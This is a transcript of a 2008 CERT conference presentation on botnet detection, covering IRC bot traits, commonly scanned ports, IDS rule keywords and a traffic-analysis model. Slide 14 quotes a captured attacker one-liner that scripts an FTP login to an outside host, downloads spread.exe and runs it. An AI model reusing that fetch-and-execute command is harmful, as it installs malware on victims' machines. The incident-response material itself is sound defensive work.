1 / 21

Botnet Detection and Network Security Alert

Botnet Detection and Network Security Alert. Tao JING jingtao @cstnet.cn CSTCERT,CNIC (+86)-010-58812898 CANS 2008 Indiana University 2008-10-21. Agenda. About CSTCERT About Botnet Network Security Alert Future work. CSTCERT Overview.

omer
Download Presentation

Botnet Detection and Network Security Alert

An Image/Link below is provided (as is) to download presentation Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author. Content is provided to you AS IS for your information and personal use only. Download presentation by click this link. While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server. During download, if you can't get a presentation, the file might be deleted by the publisher.

E N D

Presentation Transcript

  1. Botnet Detection and Network Security Alert Tao JING jingtao@cstnet.cn CSTCERT,CNIC (+86)-010-58812898 CANS 2008 Indiana University 2008-10-21 China Science & Technology Network Computer Emergency Response Team

  2. Agenda • About CSTCERT • About Botnet • Network Security Alert • Future work China Science & Technology Network Computer Emergency Response Team

  3. CSTCERT Overview • Founded in 2002 , CSTCERT(China Science and Technology Network Computer Emergency Response Team) • CSTCERT is supervised by CSTNET. • Services: • Incidents handling, include: attack ,complaints , abnormal traffic detect and other related security incidents • research and development : • Emergency Response • Security training : http://cert.cstnet.cn :+86-010-58812935 : cert@cstnet.cn China Science & Technology Network Computer Emergency Response Team

  4. Our work • 2007.9 -2008.9 ,we have handled 266 security events. • security incidents:205 • security complaints :61 China Science & Technology Network Computer Emergency Response Team

  5. Security status is very serious!-why? • You can become a hacker very easily! • Know a little knowledge • Search hacker method from Internet • Many people share their hacker tools • If you want to pay some money, someone will teach you about hacker-tech. China Science & Technology Network Computer Emergency Response Team

  6. About Botnet • A botnet is a collection of computers, connected to the internet, that interact to accomplish some distributed task. • Botnet typically refers to such a system designed and used for illegal purposes. • The compromised machines are referred to as drones or zombies, the malicious software running on them as 'bot'. From: www.shadowserver.org China Science & Technology Network Computer Emergency Response Team

  7. Botnet can cause ? and 。。。 China Science & Technology Network Computer Emergency Response Team

  8. How can we find Botnet? • Active way: • Network protocol analysis • IRC () • monitor some special TCP port(135/139/445/1433/22/2967……) • Check C&C(Command and Control Center) server address update from internet • http://www.cyber-ta.org/ • http://www.shadowserver.org • Passive way: • honeypot China Science & Technology Network Computer Emergency Response Team

  9. China Science & Technology Network Computer Emergency Response Team

  10. Main Character of Botnet • IRC message • Port scan:advscan, asc… • File download:download • Others: ping/pong,join,mode… • scan tcp port:135/139/445/1433/22/2967 • Vulnerability that botnet always exploit • Weak password (ssh/MS-SQL/windows) • Overflow vulnerability(MS-SQL/windows/software) China Science & Technology Network Computer Emergency Response Team

  11. the host was controled by this method-1 Sometimes-use scan control command China Science & Technology Network Computer Emergency Response Team

  12. the host was controled by this method-2 Sometimes-install malware China Science & Technology Network Computer Emergency Response Team

  13. China Science & Technology Network Computer Emergency Response Team

  14. C:\Documents and Settings\jackie>cmd /c echo open spreadem.nowslate1703.info 21 >appmr.dll &echo user spread baby >>appmr.dll &echo binary >>appmr.dll &echo get >>appmr.dll &echo spread.exe >>appmr.dll &echo spread.exe >>appmr.dll &echo bye >>appmr.dll &ftp.exe -n -s:appmr.dll &del appmr.dll &spread.exe ftp> open spreadem.nowslate1703.info 21 Connected to spreadem.nowslate1703.info. 220---------- Welcome to Pure-FTPd [TLS] ---------- 220-You are user number 73 of 200 allowed. 220-Local time is now 00:15. Server port: 21. 220-IPv6 connections are also welcome on this server. 220 You will be disconnected after 2 minutes of inactivity. ftp> user spread baby 331 User spread OK. Password required 230-User spread has group access to: spread 230 OK. Current restricted directory is / ftp> binary 200 TYPE is now 8-bit binary ftp> get Remote file spread.exe Local file spread.exe 200 PORT command successful 150-Connecting to port 1555 150 83.1 kbytes to download 226-File successfully transferred 226 0.750 seconds (measured here), 110.70 Kbytes per second ftp: 85057 bytes received in 1.50Seconds 56.70Kbytes/sec. ftp> bye 221-Goodbye. You uploaded 0 and downloaded 84 kbytes. 221 Logout. C:\Documents and Settings\jackie> China Science & Technology Network Computer Emergency Response Team

  15. Network security alert -IDS/IPS rule • For port scan:Use some IRC message word:asc/advscan • for network comunication with IRC: Ping/Pong,JOIN,PRIVMSG …… China Science & Technology Network Computer Emergency Response Team

  16. Rules for IDS China Science & Technology Network Computer Emergency Response Team

  17. Network security alert -Network traffic data analysis • We can build a simple mathematics model to describe Network Traffic data by Numerical Analysis method (NTNA model) China Science & Technology Network Computer Emergency Response Team

  18. Data of tcp 1433 scan Count_1 Count_2 。。。 Count_n Dst_ipsum_1 Dst_ipnsum_2 。。。 Dst_ipsum_n Src_ip1 Src_ip2 。。。 Src_ipn Data of tcp 22 scan 。。。。。。 Data of other port scan China Science & Technology Network Computer Emergency Response Team

  19. NTNA model in practice China Science & Technology Network Computer Emergency Response Team

  20. Future work • Botnet research • Monitoring and countermeasure for large-scale network worm • Some improvement for the NTNA model • accuracy amendment • Extension to larger scale network traffic data (netflow) • Data mining China Science & Technology Network Computer Emergency Response Team

  21. Thank you! jingtao@cstnet.cn (+86)-010-58812898 China Science & Technology Network Computer Emergency Response Team

More Related